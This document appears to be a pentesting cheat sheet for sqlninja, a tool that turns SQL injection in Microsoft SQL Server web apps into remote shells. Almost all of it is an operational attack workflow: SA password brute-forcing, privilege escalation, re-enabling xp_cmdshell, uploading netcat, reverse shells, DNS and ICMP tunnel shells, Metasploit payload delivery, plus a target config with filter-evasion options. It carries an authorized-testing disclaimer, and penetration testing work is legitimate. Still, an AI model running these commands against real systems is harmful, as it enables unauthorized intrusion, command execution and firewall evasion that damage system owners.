← All cheat sheets

SQLNINJA

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

sqlninja exploits SQL injection vulnerabilities on web applications
that use Microsoft SQL Server as a backend. It focuses on gaining
a shell on the remote host rather than extracting data.

BASIC USAGE#

sqlninja -m <mode>               # Run in specified mode
sqlninja -f <config>             # Use config file

MODES (-m)#

sqlninja -m test                 # Test injection and connection
sqlninja -m fingerprint          # Fingerprint remote SQL Server
sqlninja -m bruteforce           # Brute force SA password
sqlninja -m escalation           # Escalate privileges to SA
sqlninja -m resurrectxp          # Re-enable xp_cmdshell
sqlninja -m upload               # Upload executables
sqlninja -m dirshell             # Direct shell
sqlninja -m backscan             # Scan for open outbound ports
sqlninja -m revshell             # Reverse shell
sqlninja -m dnstunnel            # DNS tunnel shell
sqlninja -m icmpshell            # ICMP tunnel shell
sqlninja -m metasploit           # Metasploit payload injection
sqlninja -m sqlcmd               # Execute SQL commands

CONFIGURATION FILE#

# Default: sqlninja.conf

# Required settings:
--httprequest_start--
POST /vulnerable.asp HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: __CONTENT_LEN__

param1=value1&injectable_param=__SQL2INJECT__
--httprequest_end--

# Connection settings:
host = target.com
port = 80
ssl = no
method = POST

# SQL injection settings:
evasion = 1
xp_name = xp_cmdshell

EVASION TECHNIQUES#

# 0 = No evasion
# 1 = Use CHAR() instead of quotes
# 2 = Random case
# 3 = Random comments (/**/)
# 4 = Hex encoding

WORKFLOW#

# 1. Configure sqlninja.conf with injection point
sqlninja -m test

# 2. Fingerprint the SQL Server
sqlninja -m fingerprint

# 3. Check outbound connectivity
sqlninja -m backscan

# 4. Escalate to SA (if needed)
sqlninja -m escalation
# or
sqlninja -m bruteforce

# 5. Enable xp_cmdshell
sqlninja -m resurrectxp

# 6. Get a shell
sqlninja -m revshell
# or
sqlninja -m dirshell

# 7. Upload tools
sqlninja -m upload

EXAMPLES#

# Test injection point
sqlninja -m test -f sqlninja.conf

# Fingerprint SQL Server version
sqlninja -m fingerprint -f sqlninja.conf

# Brute force SA password
sqlninja -m bruteforce -f sqlninja.conf -w passwords.txt

# Get reverse shell
sqlninja -m revshell -f sqlninja.conf

# Upload netcat to target
sqlninja -m upload -f sqlninja.conf

# DNS tunnel (bypasses firewalls)
sqlninja -m dnstunnel -f sqlninja.conf

# Metasploit integration
sqlninja -m metasploit -f sqlninja.conf

SHELL TYPES#

# Direct Shell:
# - Binds a shell on the SQL Server
# - Requires inbound port access

# Reverse Shell:
# - Target connects back to attacker
# - Better for firewall bypass

# DNS Tunnel:
# - Tunnels shell over DNS queries
# - Works when only DNS traffic is allowed

# ICMP Shell:
# - Tunnels shell over ICMP
# - Bypasses TCP/UDP firewalls

NOTES#

- Perl-based tool
- Specifically targets Microsoft SQL Server
- Config file must be customized per target
- Requires existing SQL injection vulnerability
- Focus is on shells, not data extraction
- Use sqlmap for data extraction
- Supports Metasploit payload delivery
- DNS tunnel useful for restricted environments
- Only for authorized penetration testing